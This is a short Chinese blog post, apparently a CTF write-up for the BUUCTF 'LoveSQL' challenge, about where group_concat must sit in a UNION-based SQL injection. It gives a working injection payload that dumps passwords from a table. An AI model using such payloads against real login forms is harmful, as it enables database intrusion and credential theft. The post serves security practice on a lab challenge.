码迷,mamicode.com
首页 > 数据库 > 详细

sql注入中联合查询group_concat位置

时间:2020-11-25 12:47:10      阅读:12      评论:0      收藏:0      [点我收藏+]

标签:mamicode   concat   img   sele   png   username   图片   info   nio   

sql注入中联合查询group_concat位置

前言

  • 题目环境 buuctf中[极客大挑战 2019]LoveSQL
  • 联合查询中group_concat位置

思路

普通姿势

直到技术图片
技术图片

可以看到报错,但我们的语句并没有任何错误

换到第三个位置就可以正常显示

技术图片
技术图片

本地实验也是会报错

技术图片
技术图片

最终payload都是在最后一个位置上

?username=amin%27union select 11,33,group_concat(password)from l0ve1ysq1--+%2B&password=222

sql注入中联合查询group_concat位置

标签:mamicode   concat   img   sele   png   username   图片   info   nio   

原文地址:https://www.cnblogs.com/NineOne/p/14017473.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!